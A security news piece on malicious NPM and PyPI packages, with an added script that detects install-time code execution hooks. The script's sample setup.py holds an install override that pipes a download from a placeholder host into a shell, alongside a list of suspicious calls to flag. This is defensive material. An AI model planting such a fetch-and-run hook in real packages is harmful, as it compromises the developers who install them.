Check Point and Phylum issue a warning regarding recently discovered NPM and PyPI packages designed to steal user information and download additional payloads.
Malicious actors are increasingly relying on software supply chain attacks to infect both developers and end users with malware, abusing the widespread reuse of open source code in application development: a single compromised or look-alike dependency is pulled in by every project that installs it. A Sonatype report from October 2022 states that there were 633% more software supply chain attacks in 2022 than in 2021.
According to Check Point, malicious packages favor the Node.js (NPM) and Python (PyPI) registries because both ecosystems let a package execute code during installation itself, before the developer has imported or run anything from it. In a recent report, the company says it discovered two malicious Python packages that fit this description.
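The install-time execution that Check Point describes can be spotted directly in package metadata. The script below is an added example, not code from Check Point, Phylum or the packages in their report: it flags the two common hooks, npm lifecycle scripts in package.json and a setuptools `install` command override in setup.py, and lists the module- or class-level calls that such a hook would run. The package.json and setup.py contents are constructed for illustration, and `example.invalid` is a placeholder host, not a real indicator.

```python
"""Flag install-time code execution hooks in npm and PyPI package metadata.

Added example, not Check Point's or Phylum's tooling. The inputs below are
constructed to show the pattern and are not taken from real packages.
"""
import ast
import json

# npm runs these lifecycle scripts automatically during `npm install`.
NPM_INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Calls that give a setup.py hook a way to run commands or fetch payloads.
SUSPICIOUS_CALLS = {
    "os.system", "subprocess.run", "subprocess.Popen", "subprocess.call",
    "exec", "eval", "urllib.request.urlopen", "requests.get",
}

# Constructed sample package.json: the postinstall hook runs on every install.
SAMPLE_PACKAGE_JSON = json.dumps({
    "name": "example-lib",
    "version": "1.0.0",
    "scripts": {"test": "jest", "postinstall": "node ./scripts/setup.js"},
})

# Constructed sample setup.py: overriding the install command runs arbitrary
# code when pip builds the package from a source distribution.
SAMPLE_SETUP_PY = '''
import os
from setuptools import setup
from setuptools.command.install import install

class PostInstall(install):
    def run(self):
        install.run(self)
        os.system("curl -s http://example.invalid/payload | sh")

setup(name="example-lib", version="1.0.0", cmdclass={"install": PostInstall})
'''


def npm_install_scripts(package_json_text: str) -> dict:
    """Return only the scripts npm would execute at install time."""
    data = json.loads(package_json_text)
    scripts = data.get("scripts") or {}
    return {k: v for k, v in scripts.items() if k in NPM_INSTALL_HOOKS}


def _dotted_name(node: ast.AST) -> str:
    """Render a Name/Attribute chain as a dotted string, e.g. os.system."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
    return ".".join(reversed(parts))


def setup_py_findings(source: str) -> dict:
    """Inspect a setup.py for hooks that execute during `pip install`."""
    tree = ast.parse(source)
    findings = {"cmdclass_override": False, "suspicious_calls": []}
    for node in ast.walk(tree):
        # Subclassing a setuptools command (install/develop) is the usual
        # way to hook the build; a cmdclass= argument to setup() wires it in.
        if isinstance(node, ast.ClassDef):
            if any(_dotted_name(b) in ("install", "develop") for b in node.bases):
                findings["cmdclass_override"] = True
        if isinstance(node, ast.Call):
            name = _dotted_name(node.func)
            if name == "setup" and any(kw.arg == "cmdclass" for kw in node.keywords):
                findings["cmdclass_override"] = True
            if name in SUSPICIOUS_CALLS:
                findings["suspicious_calls"].append((name, node.lineno))
    return findings


def main():
    print("npm install hooks:", npm_install_scripts(SAMPLE_PACKAGE_JSON))
    print("setup.py findings:", setup_py_findings(SAMPLE_SETUP_PY))


if __name__ == "__main__":
    main()
```

A hit from either function does not prove malice (legitimate packages use postinstall for native builds), but it tells you which dependencies can run code before you ever import them. To keep that from happening unreviewed, install with `npm install --ignore-scripts` and `pip install --only-binary=:all:`, since a wheel is unpacked without executing setup.py.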